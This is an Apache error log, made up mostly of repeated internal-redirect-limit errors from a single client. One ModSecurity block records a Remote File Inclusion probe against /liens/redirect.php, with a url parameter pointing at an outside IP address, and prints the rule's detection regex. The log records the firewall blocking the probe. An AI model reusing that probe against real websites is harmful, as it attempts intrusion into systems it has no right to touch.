[Tue May 12 06:37:14.737360 2026] [core:error] [pid 1820198:tid 1820200] [client 172.212.136.43:37417] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:14.737387 2026] [core:error] [pid 1820198:tid 1820200] [client 172.212.136.43:37417] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:15.679525 2026] [core:error] [pid 1844863:tid 1844884] [client 172.212.136.43:3658] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:15.679561 2026] [core:error] [pid 1844863:tid 1844884] [client 172.212.136.43:3658] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:16.680519 2026] [core:error] [pid 1825287:tid 1825320] [client 172.212.136.43:17113] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:16.680554 2026] [core:error] [pid 1825287:tid 1825320] [client 172.212.136.43:17113] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:17.471139 2026] [core:error] [pid 1844863:tid 1844892] [client 172.212.136.43:42034] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:17.471175 2026] [core:error] [pid 1844863:tid 1844892] [client 172.212.136.43:42034] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:19.275180 2026] [core:error] [pid 1842385:tid 1842408] [client 172.212.136.43:50155] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:19.275210 2026] [core:error] [pid 1842385:tid 1842408] [client 172.212.136.43:50155] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:20.390650 2026] [core:error] [pid 1808852:tid 1808865] [client 172.212.136.43:33689] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:20.390688 2026] [core:error] [pid 1808852:tid 1808865] [client 172.212.136.43:33689] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:21.959269 2026] [core:error] [pid 1820198:tid 1820203] [client 172.212.136.43:8333] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:21.959303 2026] [core:error] [pid 1820198:tid 1820203] [client 172.212.136.43:8333] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:22.512872 2026] [core:error] [pid 1844863:tid 1844872] [client 172.212.136.43:8337] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:22.512927 2026] [core:error] [pid 1844863:tid 1844872] [client 172.212.136.43:8337] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:24.122743 2026] [core:error] [pid 1808852:tid 1808874] [client 172.212.136.43:48307] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:24.122779 2026] [core:error] [pid 1808852:tid 1808874] [client 172.212.136.43:48307] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:24.825206 2026] [core:error] [pid 1844863:tid 1844891] [client 172.212.136.43:63778] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:24.825237 2026] [core:error] [pid 1844863:tid 1844891] [client 172.212.136.43:63778] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:25.398712 2026] [core:error] [pid 1820198:tid 1820201] [client 172.212.136.43:48309] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:25.398748 2026] [core:error] [pid 1820198:tid 1820201] [client 172.212.136.43:48309] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:25.926786 2026] [core:error] [pid 1844863:tid 1844869] [client 172.212.136.43:37379] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:25.926820 2026] [core:error] [pid 1844863:tid 1844869] [client 172.212.136.43:37379] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:27.356549 2026] [core:error] [pid 1825179:tid 1825217] [client 172.212.136.43:45153] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:27.356582 2026] [core:error] [pid 1825179:tid 1825217] [client 172.212.136.43:45153] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:27.900739 2026] [core:error] [pid 1820198:tid 1820223] [client 172.212.136.43:4938] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:27.900762 2026] [core:error] [pid 1820198:tid 1820223] [client 172.212.136.43:4938] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:28.608146 2026] [core:error] [pid 1808852:tid 1808862] [client 172.212.136.43:54686] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:28.608195 2026] [core:error] [pid 1808852:tid 1808862] [client 172.212.136.43:54686] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:29.102301 2026] [core:error] [pid 1842385:tid 1842390] [client 172.212.136.43:10993] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:29.102336 2026] [core:error] [pid 1842385:tid 1842390] [client 172.212.136.43:10993] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:29.685570 2026] [core:error] [pid 1825287:tid 1825316] [client 172.212.136.43:49367] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:29.685594 2026] [core:error] [pid 1825287:tid 1825316] [client 172.212.136.43:49367] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:30.231608 2026] [core:error] [pid 1842385:tid 1842413] [client 172.212.136.43:11003] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:30.231645 2026] [core:error] [pid 1842385:tid 1842413] [client 172.212.136.43:11003] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:30.825927 2026] [core:error] [pid 1808852:tid 1808867] [client 172.212.136.43:24245] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:30.825960 2026] [core:error] [pid 1808852:tid 1808867] [client 172.212.136.43:24245] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:31.580411 2026] [core:error] [pid 1825179:tid 1825206] [client 172.212.136.43:24225] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:31.580445 2026] [core:error] [pid 1825179:tid 1825206] [client 172.212.136.43:24225] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:32.960527 2026] [core:error] [pid 1825179:tid 1825197] [client 172.212.136.43:4950] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:32.960561 2026] [core:error] [pid 1825179:tid 1825197] [client 172.212.136.43:4950] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:34.325344 2026] [core:error] [pid 1844863:tid 1844870] [client 172.212.136.43:24226] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:34.325376 2026] [core:error] [pid 1844863:tid 1844870] [client 172.212.136.43:24226] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:35.805043 2026] [core:error] [pid 1842385:tid 1842394] [client 172.212.136.43:33677] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:35.805079 2026] [core:error] [pid 1842385:tid 1842394] [client 172.212.136.43:33677] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:36.700290 2026] [core:error] [pid 1820198:tid 1820220] [client 172.212.136.43:63792] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:36.700331 2026] [core:error] [pid 1820198:tid 1820220] [client 172.212.136.43:63792] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:37.079068 2026] [core:error] [pid 1808852:tid 1808855] [client 172.212.136.43:24218] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:37.079105 2026] [core:error] [pid 1808852:tid 1808855] [client 172.212.136.43:24218] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:37.494821 2026] [core:error] [pid 1842385:tid 1842397] [client 172.212.136.43:4982] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:37.494855 2026] [core:error] [pid 1842385:tid 1842397] [client 172.212.136.43:4982] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:38.311851 2026] [security2:error] [pid 1808852:tid 1808878] [client 3.221.156.96:54580] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: https://45.148.122.207 found within ARGS:url: https://45.148.122.207/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKukhfeipD4uoG21FpGTwAAABc"]
[Tue May 12 06:37:38.312372 2026] [security2:error] [pid 1808852:tid 1808878] [client 3.221.156.96:54580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKukhfeipD4uoG21FpGTwAAABc"]
[Tue May 12 06:37:38.312625 2026] [security2:error] [pid 1808852:tid 1808878] [client 3.221.156.96:54580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKukhfeipD4uoG21FpGTwAAABc"]
[Tue May 12 06:37:38.573804 2026] [core:error] [pid 1820198:tid 1820218] [client 172.212.136.43:11254] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:38.573841 2026] [core:error] [pid 1820198:tid 1820218] [client 172.212.136.43:11254] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:39.053322 2026] [core:error] [pid 1808852:tid 1808876] [client 172.212.136.43:34829] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:39.053351 2026] [core:error] [pid 1808852:tid 1808876] [client 172.212.136.43:34829] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:39.698794 2026] [core:error] [pid 1820198:tid 1820202] [client 172.212.136.43:34822] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:39.698825 2026] [core:error] [pid 1820198:tid 1820202] [client 172.212.136.43:34822] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:40.275722 2026] [core:error] [pid 1808852:tid 1808866] [client 172.212.136.43:4962] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:40.275756 2026] [core:error] [pid 1808852:tid 1808866] [client 172.212.136.43:4962] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:42.559532 2026] [core:error] [pid 1808852:tid 1808877] [client 172.212.136.43:33706] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:42.559559 2026] [core:error] [pid 1808852:tid 1808877] [client 172.212.136.43:33706] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:43.935725 2026] [core:error] [pid 1808852:tid 1808864] [client 172.212.136.43:43424] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:43.935758 2026] [core:error] [pid 1808852:tid 1808864] [client 172.212.136.43:43424] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:45.009223 2026] [core:error] [pid 1842385:tid 1842411] [client 172.212.136.43:34053] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:45.009255 2026] [core:error] [pid 1842385:tid 1842411] [client 172.212.136.43:34053] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:46.532927 2026] [core:error] [pid 1825179:tid 1825200] [client 172.212.136.43:34828] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:46.532964 2026] [core:error] [pid 1825179:tid 1825200] [client 172.212.136.43:34828] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:47.170543 2026] [core:error] [pid 1842385:tid 1842401] [client 172.212.136.43:32540] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:47.170577 2026] [core:error] [pid 1842385:tid 1842401] [client 172.212.136.43:32540] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:49.516063 2026] [core:error] [pid 1825179:tid 1825217] [client 172.212.136.43:11236] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:49.516091 2026] [core:error] [pid 1825179:tid 1825217] [client 172.212.136.43:11236] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:50.150108 2026] [core:error] [pid 1842385:tid 1842409] [client 172.212.136.43:4986] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:50.150142 2026] [core:error] [pid 1842385:tid 1842409] [client 172.212.136.43:4986] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:51.152956 2026] [core:error] [pid 1825179:tid 1825222] [client 172.212.136.43:54672] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:51.152998 2026] [core:error] [pid 1825179:tid 1825222] [client 172.212.136.43:54672] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:51.774702 2026] [core:error] [pid 1808852:tid 1808868] [client 172.212.136.43:43414] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:51.774730 2026] [core:error] [pid 1808852:tid 1808868] [client 172.212.136.43:43414] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:52.649912 2026] [core:error] [pid 1842385:tid 1842413] [client 172.212.136.43:44405] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:52.649945 2026] [core:error] [pid 1842385:tid 1842413] [client 172.212.136.43:44405] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:54.485526 2026] [core:error] [pid 1820198:tid 1820221] [client 172.212.136.43:4991] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:54.485552 2026] [core:error] [pid 1820198:tid 1820221] [client 172.212.136.43:4991] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:55.477913 2026] [core:error] [pid 1842385:tid 1842414] [client 172.212.136.43:44398] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:55.477941 2026] [core:error] [pid 1842385:tid 1842414] [client 172.212.136.43:44398] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:56.223886 2026] [core:error] [pid 1820198:tid 1820210] [client 172.212.136.43:4978] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:56.223937 2026] [core:error] [pid 1820198:tid 1820210] [client 172.212.136.43:4978] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:58.026026 2026] [core:error] [pid 1825179:tid 1825202] [client 172.212.136.43:33686] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:58.026063 2026] [core:error] [pid 1825179:tid 1825202] [client 172.212.136.43:33686] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:58.590527 2026] [core:error] [pid 1820198:tid 1820220] [client 172.212.136.43:10468] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:58.590567 2026] [core:error] [pid 1820198:tid 1820220] [client 172.212.136.43:10468] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:59.321815 2026] [core:error] [pid 1842385:tid 1842397] [client 172.212.136.43:45135] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:59.321841 2026] [core:error] [pid 1842385:tid 1842397] [client 172.212.136.43:45135] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:00.074689 2026] [core:error] [pid 1820198:tid 1820218] [client 172.212.136.43:49373] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:00.074732 2026] [core:error] [pid 1820198:tid 1820218] [client 172.212.136.43:49373] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:00.473057 2026] [core:error] [pid 1808852:tid 1808878] [client 172.212.136.43:49405] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:00.473091 2026] [core:error] [pid 1808852:tid 1808878] [client 172.212.136.43:49405] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:01.314276 2026] [core:error] [pid 1820198:tid 1820209] [client 172.212.136.43:45125] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:01.314311 2026] [core:error] [pid 1820198:tid 1820209] [client 172.212.136.43:45125] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:02.452165 2026] [core:error] [pid 1825287:tid 1825305] [client 172.212.136.43:43177] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:02.452200 2026] [core:error] [pid 1825287:tid 1825305] [client 172.212.136.43:43177] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:02.996251 2026] [core:error] [pid 1842385:tid 1842393] [client 172.212.136.43:33664] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:02.996274 2026] [core:error] [pid 1842385:tid 1842393] [client 172.212.136.43:33664] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:03.491035 2026] [core:error] [pid 1808852:tid 1808877] [client 172.212.136.43:32525] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
